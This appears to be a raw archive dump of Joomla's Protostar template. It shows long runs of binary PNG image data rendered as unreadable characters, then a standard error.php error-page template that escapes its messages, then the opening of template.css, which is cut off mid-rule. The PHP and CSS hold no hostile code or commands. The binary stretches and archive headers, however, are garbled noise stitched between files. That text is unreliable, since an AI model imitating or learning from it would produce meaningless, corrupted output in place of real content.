�z�S�:="g6Bi�����2yk�*���)�
b�
G���,.�2�jY0r��~щ��Q�I#]X���%=a�/-��)1z���C�Aks�<Hȼ;�C6偯�]���S��p�бC���[�P�q�؅,da�>�ƖOz!�$�Z�팑���od�N�_�b� ���WJ����_I
�iiJ�Y\�[m�:'f�x�V��T��m$a}�
��^�NM/��n2}N��>�(�~v��	�C�z����v����2�%���O��c|��{�^U����`� I}`�F�������van
�
N{��MD΅��~
=�/��3=#t�..t��v����A��z�@`�̯�����^�&������}U�����HFe��F�@o+���b�P~}��.��Ȋ�O�P�=.�#+>/i��١y��2�O.5�^��CX��U������c�����ج�'�ܱ���9
�_)�
H����%��U�|z������-����9��'L�%?̿�P�[%NO��dT^O�s�ӄ��H�]��$�m�|�̓_?(��s��Q5p2�{c�K�����.���; 0*��F,9h!�$���v�7h��c_zLԍ9����i�{!��..a�K��m�'�طxdү�"+Br�B�rz����Kz�L���׳�U��z�[Jɸ|��KFO���;�Lp��$��v���[�g>QI��_գ�G���������VE`E�O�r�rʨ� �W�Z��..b�KL�q[���ob��|�`|����8���rzW��-��W]_��8
���|�b�{,��AΠ>�z:����ڋ����ְ�*���:�Rɨ3����"ֻĄ��!�H],��t�%9�}|N����s�Qi�{�ϗ_=ш���Q��{b��5\��	�]\f�x5��Q��?Qn�_�}N���O�]��O�9��ؤH�%�6�������]Y�p8�UgU����p8�:gU����p8�:gU����p8���$I�p8�XY���ڕ��5���?�+�E	��l8> �<+�8��BX0G	,~nM���$��CL��V����\���|�f
䌜IA���|���ʜ�Λ�4�c�����y��O3�2Z�,�BxH��?�z x�dr`m���6�B�ͬ$蹰#�l̻v]B���:QC��O^������:�*�z���,�ܬ+���'��G �+��?����#�ou��{v\*�5o�M7<��˚ئ;��n�)�!E��H����(YK��پ�i	h��� �Is�~��;�]+E�_���a�V�������V4Ab�SSWl�
�1w%j�|{=�X�Y)��ʀ-s�����6����_y��:��ڔ\(.&�LM?x$�,�'t��v��w��~�?q�D�<b��j:MH���:N����%��+A��0�̪P�D�A�c<({�g빭��d�‡~҃���v�_�'N��&�/_� ���"(۽��@ʨ2�</��E�R.n�fQ(nr��A~���=�u.�E�=����c;��@n�4��Gy�Z��'y5NS�����֟Ě;��}���#��Q��}�{�Em̦I l�HDP�c��,n��(㫆̭�Z���+��}�6�~G�K0ڔ~5����{��>���a�?p��C��;�=������?=�����\\(a�j*1��Hت|zn�}n瞝�j�=��qy����0�nVD#�b`��=8{9u���;�|��'0hlOelP�1��]p`��:������g6.I-$��
����S�Q�B�s� �f��9��S
�=�0��|ԃ0��qX�|�rRB$׹w�̨�DP4+��H~1�E.��/�V��"��?�;�b
p��r\�������@��=<������ƿ:��#sа�o<�(}����O{���N�S���P�v�6�_�
\��z(�qo���a��/�-��:}p���b����H�nU2*�6�f-5vk�9�kjt`ă�^��	�Q���߉>f�s�E,fV���[^[���v)�\\-�{�xv�U�?�\�Q�h'M��k�[��a:CBqkQD��9/���T��˃j�T���+��AVP��;�1ˊF�����Cbǥ� ��cn�l�8ƫG\Wƛ�	���߭�7jǫmX�f��V
���f��"�rFEl�
���K��8"�m5��ZnB��ɡL��F�}���>hQ|�!���L�
B�/^����ú%�"�˃C�iH>E(+��/����P�Uk��};4ˣY�>�4���G��|���%z�*�g��=O�&�"�QU���<���iw���G����OOV�,Ȋ��!����s�J�mp�!��Qͭ��EQ�1[Q0倾��_��X��
-"�A��+a�:&��]I���Z?��-��ym��͡���^Y�c�D��︔yU�(�v���{��p�\�w�V&Ӫ�x����l;#ΈP�qf[_5��n}IEC�����;�s�Kq��zT�_��7"��c����G�� �h�䝅�����STر��r�˒�r��Kb�N��o���鼭Ue�;戇zX��`B�^Y�'|b��ki�֗��8��q��*�he4��44w�n��}\��Q�X�e�#/;=\8'nW�{Ń]Ƕ��^S��W=(��
�4j3��W;D4ЃgWJl���D4��*Y�n��!��ˍ^!Z�q5X�0��E�O�����v��ӁLJ ������U;N�����'����ZZ��
�I�n�4�z�2w��R}����j0N�]���
tzYȃC��Ц_�kOO���fT5E�u�̍J���Y���,.V(/#cp:h�Ox>r�9�?͉b�����ó�\Yj���J����b�M�X���	| u#�5��F?�k�H�%}�7$,ۿG�N<�CG�y��;0��iF�����7��p��U������p8�U������p8�U������p8�UxU��Q8�C2;a�<gC�mQ��Xuޣ��a$�"d2�v���r��S��RV^U�E�1M�|�s�-��R�Mr���O��D8x���4�!4;a�eSx��&��T��d�I4en8I��,J��g�F*�u�uݮ�x
���&�r�Kf9�kR�~����:����Cyx��C��E���]^������+#O�����3/X�� ��۹�z��xH��z6wl9�j��Գ
��c��H>�[�F�A�ų������l�l,�W?��^^n|鱏�kyU�[�[>�I�Im����������T>�d
��3��'dS���f��.�#��Н�帄�Rp��}��������h8�V-��j�u6+XV��L�]������2��N��ah>�U��YHç��M�Edo=I������V�	=��ƅÏBO��)���B������Y�dk~��T���6{Í�i 27�y�dЖ���9ϼ����'v�UM�d�������3��<4p������������zM_5
ˑ
]�
���Jςu b��L��`�����Fo���'�R���r�_٦���G�I�P���[$}��{�"9#!|֕�f�G���#sК���Y�NP}�����O}���!m�Ov���Y''k�HL���HM7	�^�ޭ�֯f�n<q��S'�K���?}�O���[����WF���6!��L@fj�7Ӧ�mѠ�75
:��#����n�G��-��[_�h؞��w̩�h;���{���� �y�ߊ~K����"��2���k@�ʵ��&n@	��Iު��PE�+�x~T�iT8�G��h�Q��U��̳{0�?���U!�����]"��:K���w�ދ4�{���Z@�?Z�>���M4�������[���/=��Y$�_��9�@+������C-�Y%7��$N�#0��x}ت:}�}>z����S���șgzFDb�VE 1}�ʞ>xkS&�TF��Q�9�$��s�Q�#;��l
ky�n��R���l�РO�d@�8GVB��+��=_��4���{>���ߗc�o%lPk�q���A�R�)�@x�B��J�;РSˣ#/�.E��ܨo����߾�Nl��j�������m���{��yt��'��։�B��>� ��	G�՞�z4�}�'t�Q�.��w~�;J�t�Jpۓ�<1��O�B�� �3��ԗ������_DY5��n�akUy�&�Guw����k�Xɧ}˝�6��'�hP�噡y���<�Gem�_����x��}@Y�S�p<�e�Y���ݶ��[)�}�/�Jt�i���ه�l�=\����Ʌ�6��yL.Ɠ ������V��YF?�"�}�[�3��j�0�70*d�Q�ӱt�*	�~T�߀�==_y�صo�>�H�xh�K�`�$S�c~nE݋��#�C�&V��i�B�5����	�q�@B�^K��;^|Z�Y:�'vn�C����Ĥ|��&J?����ϼ	��FU������O��S{O�8~}#�+��2����W"�
%��(19Ͼ�JM��zz��.�+t����[iuĞ
�_���ǝ.3�`�^�����m�D<�������
��x^��'�z��:pr�%�U�O892�t>2w�����E2�
���}�BV�V��g�"�h���w�x����W�X�T��P���a����S���*=�4�����z9S��[������N��A[vs9Ϥ'��^*���+%c=1�Ȩ�D���֨����4�9� #v�%�L�Sh�e�ߡ�,4@+�@Ğ�
$�����;t���0Eh՝�ޮ�_/}N�'���q@Y�³m�w��d`O�$��l��z�aÛ*�N��+�v�������v��GH��B�I�ֻ��\m�s��P��®��;r\�}�w:�֨�Z�תE�뱽��~�å������&\�O�vC��f���!�qa�$L�E'fq01;!���(zYT7^���.z��MK�b(Z�����l�tD��36Wy��w\��A���맦5Fe֪�V%�3��"�a!Z�/��1hUj'$� �F�^皠��'f[��Ә)~γ�h����=���T���Y�%S�~��,�É��6��?�/���F�#�IEND�B`�PK!��@�'"'",protostar/img/glyphicons-halflings-white.pngnu&1i��PNG


IHDR���ӳ{�PLTE������������mmm�����������������������������������������������������ⰰ���������������������������������������ᒒ�������������ttt��������󻻻������������bbb�������������������������������������������������������eeeggg��𶶶����������������������������xxx�����������������������������󛛛������������������������������Ƽ�������������������������������������������������������������������������������������������������������������������������������������������������������몪����������������֢���������UUU������������������������������������������������������������������鿿��������������s����tRNS���#�_
/�����oS��?��C�
kD���OS_������6��>4!~a�@1�_'o�n�ҋ���M���3�BQj��p&%!l��"Xqr;�� A[�<`�am}4�3/0I��PCM!6(*gK&YQ�GDP,�`�{VP�-�x�)h�7�e1]��W��$��1�b�zSܕcO��]����U;Zi<N#�)	86pV��:h�#�0Z�Q�JN��EDT��܅uIDATx�c�H��]�ȶ�q�<��&���d�NC�i�yf��������p����e��?�]�G�V����E�z��}����g��7�r������7�|Yw}���š�>JN�S!�ױ��;G$�pA��f�3TJ1�Z�8�+ �6�1��	q:u�;:�,��W�z�7D�Ώ��1#�D�1iǑ'�F�� �C �c��'K�	�af�ᱟ�+s�B�hM��"��.�i�f#c�]�p^G�CI��#|Pd��:�T�#�JZm[��m��VC���7�)c�d���	�~F��)��*!�:\�y�Y��K��L���
��<ޅ��w�6���C^�e6�j�{"wZ%oO �Uج&)y�]*�}0y���Ӈ��r|\�V�7�٬a��
����R&�U3W��!���<"��Tb�{9佩WS���ȯ��}��YU��*���k�R�;m''�`��N����w�'�JM�!���6�i��?($ZI�Tp���pڴ�hM�C>�!��*<��*�uIU�t��5�s���h���z���K��t�
B�b|�yT���r��c�v�"y���m�
�*Y���X�c7y�l��?<�� Jjr�fZR{b��������el��$�Iy�P����X��Z�~GH՜9M���E�[2WJ��F�﹟|p���c7�
.��.S�[X���|)X/�ۅ�v\��`~q�����Q�y��N�uK��dw$X�ǿ�>�)5��b|����#�!�f�RJ�U}���1����jLc�V}p�Ш��R��m�Vq����y�l�’/3y�;������&��:�H���ɐ?�ǐp���bA�	��[ݘOBy%+N{d�T�R-�L�Z!�Z�b��/��-�8`-�����U�z�U��d�+�j@m�^ŪT�i4�
`t�
&�Nsn	i*J-�,E,u0$�>1�V��ZkuWV��L�<���x��{���鍅��{|���,�Ľ�����=��=3�7�j}-��K6g�Wa��y�aHQ�c���z�z��/ѕ��Of�yk~�>����*(N@0Q�{|���t3j�MOn����"����OiJ]�ͨ^���A{�m+@T3����㸟W�b�Qq���+3���+0Pj���*$���$���d��br�������[�ɭ�Vsr�9�՜�jNn5�ZF��՘1�Fyj�4UqH�zdh-宓5���uJ��eĶ��ˡ��D�5=d��>5�^�!"��$� H՗JƎ/�y蓍�����O�ߴ[�\Ǖ?�f�5���٬�2L ��^
@,{����G� E�����Vcjb�U��l�NN�6E��]�_MޕѪ��;_�J��Hu"2[N���x��Y���)_�?����)�0��h/���0�����Ol�*�2�3U�:�46�ဎӪ�CQ'���Dޡ��5�>`�<I2�\�L�Yłͪ���qz�
�W��I�Gj{Xrv[^�B���Y����v��@��(�#�w��_}
��Y��qZ�u(��Kv�5����|���׬u?̇̃$å4��:ж���r���J}Y';,�ّ9v��F��|k"W��u5&Z9�ֿJ��s$���笿���V�f����s����O#�y�R�g�Yֹ��=w���*?����iO��m��4�V?�*?&.�RT�i����*:��U�f�j�$�U��!Š���O������b`�䗐�%Ҳ?ڬ��yBi�`>9������V[�e�2Z,��K��_�kN��s�t\V�=iU��*���G��#�n4Y�yM��I�9Iv�.I��[���:�_��?��6/�^�i�=��2yf@�xz�z��d^�{D�T�J��V]���$[J�H.;FEԩ�:U�uD}R�'ɷo%I��K���|���b��~�3[�-ѭG�Y���Sd{�R�m��ǡ��[�lU�'P�ps�:�j�ѿ�A�G���a)3;KYge%�#r�D����:�>��m�|�몕SC���fe�ChÒ_Xl��>�x��M��Ӫ��A����>���d�y�qꀑ=��jeehu�	��yە�/T�n�TP��*�8;;�UG�j�$���$YFE�q��j�:��)���m}G��{D��bh�ph[v���64� �
��4��V�f�`E?O�2�,u��:@�:��3"/�rܶ����~:���]J
��ZX�64C!y�����[�ɭ��Vsr��՜�jNn5'���[�[�7b/�m3��[;D���e#�c;C\�����&��� ?�V�V���x�\�7VU��V�t��e>"�Yr���$�K��HGk\ͪ�4��:#�)ӱ�BD؏�l�
l�6�:�ZS�2Z�1ᝎ�d���ȅ��Ǎd���f�"���0D�cXm�d�}(V�E�>T �H�u�k�cY}-N��L�`p�#���y�
Xx%_fF&�_�01�])TH�{�H3��k���j����'7mZG�J�d��X��������I���6�`�D䞡њr�+�<��عݛY�iY©��Zwh����cuY%,�W?}����U��U�Y�c��!�����6�?�};�k�����:F�R���Z�kݪ��{�"?�I��>�}��o�qW��x6���c[UCd�Z0�8�gy�1I�x�0��J���;�!�ĉ[a���W�_�e²EE����)������:�qVj�H���;J���հ�q&����3�y|��ɪ��b����}�|AOzJ�]�kS�s<
�C|�HV�dy|���9o��V����b=���ɟZ���$�Rof�+����X^�ٳ��}��9>)�v�
��#Y%Idn����ù��^d�5oݟW��I�I>�*�֑ʽB����pQ��c��-���~�YK�R�.
��O3[��\����g�=�{`[�b{r�F.�j}R�^^�R�Vӹ�
��܋��BX;2EKf�,Հɒe������Gn�7�Q)g��NZm�kՎ�*�V�I^)f;U%R�`U�PA&V�����hҲ�E!:�{��EF���Ǟ�p�
�:PȆ:��l����$.'���[�ɭ��Vs�9�՜�jNnu\r�ac���)r��_�Y&�]w��+�rn�
�Kcr��KO�d��fl�ח���,��pc�$}�u]�O�c_�TC/R���^�R�ȑ�wq�a���;$��SM����-��U�����y�c�yj�,[���2�|�>�W�\�^f�ѥ�^��t=Z���T�VR�?]�\���,�3�����mQj����E֜�1���jg�̹^�3+��x�2�.I��k�?�O)�&�����O^)��z#�'���#�qQ��[��w�r�+'Y�oU�,�6dN�Y��E�'�VW��N�'��zG�'�2���o�5�Ь�����3"���6�b�;#\g�
\[H��ԲȕS�wǶJ?���$�����"��[W���jrVЈG��e~]K`�s�<f���+��c�d�N#_ci]��}|�V�)��\�<e)ǵJ�bc�۬�~F�i�R�V喊9r�7E^����F� ����T_�?�;1M#]��w��}�ZG�T.�v�����ٶ粔=���/���j]i%�Un�x�}~R�j��u�	&H�/�}���.T�f^]��T��C�H����H�T.�ӑ�}�/�jw:r�U�N�=&�ǰ����G�T,�Ps�m��$��u��>9��w����˼��S	C+�̔
���rQ��A�7[Ƶ�(�t��R�4����K�ޮ‹�G)U��ds�6?0Is~�9n�q)Z�a��=�D��W7Ec���rt�jO-�\y�Qkbaܻ%=�C��\���۪�*�B�.��n���Z��E���̤�����|:��{�=V�n[&��H�"WN�]��kU��P�%����"��ɦ�]ա�#��S]j=+����m_�Gd�B5o]nQӺ�5V�n[&��J�"�2o�o;z2��uz\C)5ɓ�O����O6��v'�pQ]Ԏ2���.N*U���4�[c�ζe����+��t�\��O�r`��
"�Z�l�R��6r��n+��?5�ɭ��Vsr�9���jNn5'���[�ܪ�����$p�Ǡ3_su�J���aZ
}k{�w+ׄ��������cp�gÑ��8xI����{ׄ�脉U��s�<"�Q֧��^aL��X��'W��Gɧi�Ne��Fr{$�r���H�7��ucYտ|A�JI7Z�$���IN�r����=��-Z��3�2�o�nL��n�!�����i�,��Q�絆���1��
j�٭v�%���֭����XV_�`�,��R(%I@�&9iɣBP,�ȶ���i��ۺ�V�2�G�*�w7`�!�Ǭ��I#O��Ж�A�ֹy��F�AM���j���q���W�nWK�j{)b��hC�A*(e�|&�F���%so�Y~!9y�c!)s]������C���z�-9��ܖy"u���;�{N3����s6ۨ��c��)OC��mK�&w�B��K��-3'd~}a&��dN޽�M[�̩YX���C>�l;j��I����U#��۪�ƄR$�N��ۂ.����nJ�qR]��r�ߛ�%��L�R#3���R�:��{xY���H)���z]?1��t���}�F���j��8(�G�D���3l�$��z��˵��iU�F:l�*(<��\�&9i�0�C_��%{�����#�7��i<���Z,�V��u��z!�șH5�j�N�5o����~;5oo�c�Z�\X`�+	�.7�]�`oT�?8�)1"#�:P�xԈ�ޛ�%��Z���#$Td����u�~��,9�B����@�pZ��ɝ-#=����J��\yW<���}^�D.E�}P��^����^��x�⊵���/*K�hهwӣ�i��T��\�]�V�…*Y��{�]��ߵ\�"<��$��,�{�uv�]���x|��P
�P����b.�c�~0bG�R��.�FV��\���;&��M��՜�jn5'���[�ɭ��Vsr��՜�jx/����{ɜ~]�=��(���ň�3�dj
V|�2���N�,����>�Bj�ϓ��������Q{e��+h���]��Z�������,tHf�b�gY�>%��n>�B^��`�Į��=O���|��GFK/'j�$9�E���?�)1E�:�Ck��N(^O�l���G��_�,/��j�>�r�D[�d��؟,��'Y�����H�E�;���&jM?�D#փx��:�~h�?��΍C���ਆ��*u�Ry5�h������/�F?�i��{��;\��2Z�ϓ,wh�i��f_�"��o'I��dti�ߓG��wH��¸�[$Y�1[�g����>@� I��U�V#�ͺ}D�^�0Z$O�&_��|�8��â���o���v����!��U$0�Jt2��C��<�]�Ҽx�m�ڤ(ӣ�&�o��Oz��O��x�"O����J�i��\��0�:�U9���Mp�h�)Β�x`�����f�]e)Y����B�$_�"9��7��v�hJ޵c�|:����T�`��?hn?N6�����_R9Pf�7��h�lk�#K�TJ���_b����V�ԖK��\t���/p@���j�r�C��VOp��ٯ��A��E//Q�4wo���M�oƐ�&{_I6/��\I��?�8�#l��\�Q6BS��9C��X�i�gK5p=ɪ�Z_���!�
���j5b�"��wuy�O۬��5���_�}^8„�ܽWl�������f��y��F~�zF�(���ca��8H)�|����Q)˱ʤU�wdZH�}"�I��ZLΥ�]%�E=f�
�UH�Q�T	ч�Y�<�!��܈Ԋ�z�������bBw>^�K��>���y��t^'�:���.��d23m7U�–�^ۺ0�K�m�+E)!����Q�IX�ڟo��4y�Z���,Ůiok�`6��Y>�����N����E���D3�[�^xR�L���_�����8��'^e̝}���+o����}<˱��U�ꤘӝ�I�+M&4+r���D%�֋6M/�f�Q���$�p����.��j��Kv+�'��gf�/"#�Q;�ט���U���{K��R��;�\�X�>E�>h+�ȩ�lV�r�<�d?��{[[��R!�I�1�D��TU#�����*��Y��R�s�6'���n�7ݕ/`R
��y��g6~p���[�ɭ��Vsr��՜�jNn5'���[]�_K����Bd%$�+���}x{,���c�l��D�������2ׄSd��>0�I�ըG�
��8lt��X�X�٦��}�#���K�O~JNj�l�Ur�lg�z��=>�Ň�~��%�ؚ]��?�f�hJђ�}���<AX���G#=g���{���0y,�Y��]�c�r�u��턀o��.,�l~M�yn���>2�y�����ѧ�E�	�, ���`���L�����'��>���������0��5ZZ8��6j|�,V��������Kw�A���w��e�L�ſ�9e���Q3W����!�iͣk�"���U�^�|�ٖ�M�hI����fk�	s[�zA�>s��}�r��
�:&R��	o���X3��s�+O�o#��z�?��{��⭲Y�_���b���A�O�o���M��6�>���9/����G�<�.��9�V��h�'9���ɓ0٦��9�$R�)JT�	��*x}�����>��Jc��Z&�V��>��c�"6��;w�b�G����y������0^NU�6���'����?��h\'��"9ﱞ���t�g�SJ��Y��9�[g�]����e{�n��L�U����lV�B�#�BA~+�y+�x���]L�+��c���3�����<�ǿi�����<��a���?�5����F�P:�p��ß RD�O�f��O?

�|`O�s
Pu#o���|2F-����LU^W��H��C�,@Z��5���O�؛����3���8�G�ԣK����W/���;�/Y��_k)�y�F�~�mV��~�p���[b�k�����}�Kr��R�y��y(���'�E�-R��6༮��|��ݡ��K��"9�����ό���;���+��c��6-����Oޕ��ָ�Ց���?���z^�[_�����5��T�O����w6ai]��W�c{X�F��0��S/8����-Ra ��r�άg�����T���G�?6'v/�V��R�o^���D��LK�?����5T���L��į�0�*��#aǟ��?�TXQE�.�qw8�y�e~��=�g�L�����ܣ�s���o�����
�����{fg�� ��N��8�{_*VjE���SU��T��^�!~�C�n&G�R��Dpq�
|�=>��?�΅T�󪸮jX��M(5J�ʹ6�
��� (�[��N����\������aF�T'�ˁ`fй��VC�
�����[>�|��:�r#��R�%�lgl�C�V&&�n�&FaEos|T��w�w�gxr�r�㋲����!aɤ8��?�l.n⇒������IEND�B`�PK!��:�%�%protostar/error.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentError $this */

$app  = JFactory::getApplication();
$user = JFactory::getUser();

// Getting params from template
$params = $app->getTemplate(true)->params;

// Detecting Active Variables
$option   = $app->input->getCmd('option', '');
$view     = $app->input->getCmd('view', '');
$layout   = $app->input->getCmd('layout', '');
$task     = $app->input->getCmd('task', '');
$itemid   = $app->input->getCmd('Itemid', '');
$format   = $app->input->getCmd('format', 'html');
$sitename = htmlspecialchars($app->get('sitename'), ENT_QUOTES, 'UTF-8');

if ($task === 'edit' || $layout === 'form')
{
	$fullWidth = 1;
}
else
{
	$fullWidth = 0;
}

// Add JavaScript Frameworks
JHtml::_('bootstrap.framework');

// Logo file or site title param
if ($params->get('logoFile'))
{
	$logo = '<img src="' . JUri::root() . $params->get('logoFile') . '" alt="' . $sitename . '" />';
}
elseif ($params->get('sitetitle'))
{
	$logo = '<span class="site-title" title="' . $sitename . '">' . htmlspecialchars($params->get('sitetitle')) . '</span>';
}
else
{
	$logo = '<span class="site-title" title="' . $sitename . '">' . $sitename . '</span>';
}
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<meta charset="utf-8" />
	<title><?php echo $this->title; ?> <?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8'); ?></title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<?php // Use of Google Font ?>
	<?php if ($params->get('googleFont')) : ?>
		<link href="https://fonts.googleapis.com/css?family=<?php echo $params->get('googleFontName'); ?>" rel="stylesheet" />
		<style>
			h1, h2, h3, h4, h5, h6, .site-title {
				font-family: '<?php echo str_replace('+', ' ', $params->get('googleFontName')); ?>', sans-serif;
			}
		</style>
	<?php endif; ?>
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/template.css" rel="stylesheet" />
	<?php if ($app->get('debug_lang', '0') == '1' || $app->get('debug', '0') == '1') : ?>
		<link href="<?php echo JUri::root(true); ?>/media/cms/css/debug.css" rel="stylesheet" />
	<?php endif; ?>
	<?php // If Right-to-Left ?>
	<?php if ($this->direction === 'rtl') : ?>
		<link href="<?php echo JUri::root(true); ?>/media/jui/css/bootstrap-rtl.css" rel="stylesheet" />
	<?php endif; ?>
	<?php if (file_exists('templates/' . $this->template . '/css/user.css')) : ?>
		<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/user.css" rel="stylesheet" />
	<?php endif; ?>
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />
	<?php // Template color ?>
	<?php if ($params->get('templateColor')) : ?>
		<style>
			body.site {
				border-top: 3px solid <?php echo $params->get('templateColor'); ?>;
				background-color: <?php echo $params->get('templateBackgroundColor'); ?>
			}
			a {
				color: <?php echo $params->get('templateColor'); ?>;
			}
			.navbar-inner, .nav-list > .active > a, .nav-list > .active > a:hover, .dropdown-menu li > a:hover, .dropdown-menu .active > a, .dropdown-menu .active > a:hover, .nav-pills > .active > a, .nav-pills > .active > a:hover {
				background: <?php echo $params->get('templateColor'); ?>;
			}
			.navbar-inner {
				-moz-box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);
				-webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);
				box-shadow: 0 1px 3px rgba(0, 0, 0, .25), inset 0 -1px 0 rgba(0, 0, 0, .1), inset 0 30px 10px rgba(0, 0, 0, .2);
			}
		</style>
	<?php endif; ?>
	<!--[if lt IE 9]><script src="<?php echo JUri::root(true); ?>/media/jui/js/html5.js"></script><![endif]-->
</head>
<body class="site <?php echo $option
	. ' view-' . $view
	. ($layout ? ' layout-' . $layout : ' no-layout')
	. ($task ? ' task-' . $task : ' no-task')
	. ($itemid ? ' itemid-' . $itemid : '')
	. ($params->get('fluidContainer') ? ' fluid' : '')
	. ($this->direction === 'rtl' ? ' rtl' : '');
?>">
	<!-- Body -->
	<div class="body" id="top">
		<div class="container<?php echo ($params->get('fluidContainer') ? '-fluid' : ''); ?>">
			<!-- Header -->
			<header class="header" role="banner">
				<div class="header-inner clearfix">
					<a class="brand pull-left" href="<?php echo $this->baseurl; ?>/">
						<?php echo $logo; ?>
					</a>
					<?php if ($format === 'html') : ?>
						<div class="header-search pull-right">
							<?php // Display position-0 modules ?>
							<?php echo $this->loadRenderer('modules')->render('position-0', array('style' => 'none')); ?>
						</div>
					<?php endif; ?>
				</div>
			</header>
			<?php if ($format === 'html') : ?>
				<nav class="navigation" role="navigation">
					<?php // Display position-1 modules ?>
					<?php echo $this->loadRenderer('modules')->render('position-1', array('style' => 'none')); ?>
				</nav>
			<?php endif; ?>
			<!-- Banner -->
			<?php if ($format === 'html') : ?>
				<div class="banner">
					<?php echo $this->loadRenderer('modules')->render('banner', array('style' => 'xhtml')); ?>
				</div>
			<?php endif; ?>
			<div class="row-fluid">
				<main id="content" role="main" class="span12">
					<!-- Begin Content -->
					<h1 class="page-header"><?php echo JText::_('JERROR_LAYOUT_PAGE_NOT_FOUND'); ?></h1>
					<div class="well">
						<div class="row-fluid">
							<div class="span6">
								<p><strong><?php echo JText::_('JERROR_LAYOUT_ERROR_HAS_OCCURRED_WHILE_PROCESSING_YOUR_REQUEST'); ?></strong></p>
								<p><?php echo JText::_('JERROR_LAYOUT_NOT_ABLE_TO_VISIT'); ?></p>
								<ul>
									<li><?php echo JText::_('JERROR_LAYOUT_AN_OUT_OF_DATE_BOOKMARK_FAVOURITE'); ?></li>
									<li><?php echo JText::_('JERROR_LAYOUT_MIS_TYPED_ADDRESS'); ?></li>
									<li><?php echo JText::_('JERROR_LAYOUT_SEARCH_ENGINE_OUT_OF_DATE_LISTING'); ?></li>
									<li><?php echo JText::_('JERROR_LAYOUT_YOU_HAVE_NO_ACCESS_TO_THIS_PAGE'); ?></li>
								</ul>
							</div>
							<div class="span6">
								<?php if ($format === 'html' && JModuleHelper::getModule('mod_search')) : ?>
									<p><strong><?php echo JText::_('JERROR_LAYOUT_SEARCH'); ?></strong></p>
									<p><?php echo JText::_('JERROR_LAYOUT_SEARCH_PAGE'); ?></p>
									<?php $module = JModuleHelper::getModule('mod_search'); ?>
									<?php echo JModuleHelper::renderModule($module); ?>
								<?php endif; ?>
								<p><?php echo JText::_('JERROR_LAYOUT_GO_TO_THE_HOME_PAGE'); ?></p>
								<p><a href="<?php echo $this->baseurl; ?>/index.php" class="btn"><span class="icon-home" aria-hidden="true"></span> <?php echo JText::_('JERROR_LAYOUT_HOME_PAGE'); ?></a></p>
							</div>
						</div>
						<hr />
						<p><?php echo JText::_('JERROR_LAYOUT_PLEASE_CONTACT_THE_SYSTEM_ADMINISTRATOR'); ?></p>
						<blockquote>
							<span class="label label-inverse"><?php echo $this->error->getCode(); ?></span> <?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8');?>
							<?php if ($this->debug) : ?>
								<br/><?php echo htmlspecialchars($this->error->getFile(), ENT_QUOTES, 'UTF-8');?>:<?php echo $this->error->getLine(); ?>
							<?php endif; ?>
						</blockquote>
						<?php if ($this->debug) : ?>
							<div>
								<?php echo $this->renderBacktrace(); ?>
								<?php // Check if there are more Exceptions and render their data as well ?>
								<?php if ($this->error->getPrevious()) : ?>
									<?php $loop = true; ?>
									<?php // Reference $this->_error here and in the loop as setError() assigns errors to this property and we need this for the backtrace to work correctly ?>
									<?php // Make the first assignment to setError() outside the loop so the loop does not skip Exceptions ?>
									<?php $this->setError($this->_error->getPrevious()); ?>
									<?php while ($loop === true) : ?>
										<p><strong><?php echo JText::_('JERROR_LAYOUT_PREVIOUS_ERROR'); ?></strong></p>
										<p>
											<?php echo htmlspecialchars($this->_error->getMessage(), ENT_QUOTES, 'UTF-8'); ?>
											<br/><?php echo htmlspecialchars($this->_error->getFile(), ENT_QUOTES, 'UTF-8');?>:<?php echo $this->_error->getLine(); ?>
										</p>
										<?php echo $this->renderBacktrace(); ?>
										<?php $loop = $this->setError($this->_error->getPrevious()); ?>
									<?php endwhile; ?>
									<?php // Reset the main error object to the base error ?>
									<?php $this->setError($this->error); ?>
								<?php endif; ?>
							</div>
						<?php endif; ?>
					</div>
					<!-- End Content -->
				</main>
			</div>
		</div>
	</div>
	<!-- Footer -->
	<footer class="footer" role="contentinfo">
		<div class="container<?php echo ($params->get('fluidContainer') ? '-fluid' : ''); ?>">
			<hr />
			<?php if ($format === 'html') : ?>
				<?php echo $this->loadRenderer('modules')->render('footer', array('style' => 'none')); ?>
			<?php endif; ?>
			<p class="pull-right">
				<a href="#top" id="back-top">
					<?php echo JText::_('TPL_PROTOSTAR_BACKTOTOP'); ?>
				</a>
			</p>
			<p>
				&copy; <?php echo date('Y'); ?> <?php echo $sitename; ?>
			</p>
		</div>
	</footer>
	<?php if ($format === 'html') : ?>
		<?php echo $this->loadRenderer('modules')->render('debug', array('style' => 'none')); ?>
	<?php endif; ?>
</body>
</html>
PK!]��Y�Y�protostar/css/template.cssnu&1i�article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
nav,
section {
	display: block;
}
audio,
canvas,
video {
	display: inline-block;
	*display: inline;
	*zoom: 1;
}
audio:not([controls]) {
	display: none;
}
html {
	font-size: 100%;
	-webkit-text-size-adjust: 100%;
	-ms-text-size-adjust: 100%;
}
a:focus {
	outline: thin dotted #333;
	outline: 5px auto -webkit-focus-ring-color;
	outline-offset: -2px;
}
a:hover,
a:active {
	outline: 0;
}
sub,
sup {
	position: relative;
	font-size: 75%;
	line-height: 0;
	vertical-align: baseline;
}
sup {
	top: -0.5em;
}
sub {
	bottom: -0.25em;
}
img {
	max-width: 100%;
	width: auto \9;
	height: auto;
	vertical-align: middle;
	border: 0;
	-ms-interpolation-mode: bicubic;
}
#map_canvas img,
.google-maps img,
.gm-style img {
	max-width: none;
}
button,
input,
select,
textarea {
	margin: 0;
	font-size: 100%;
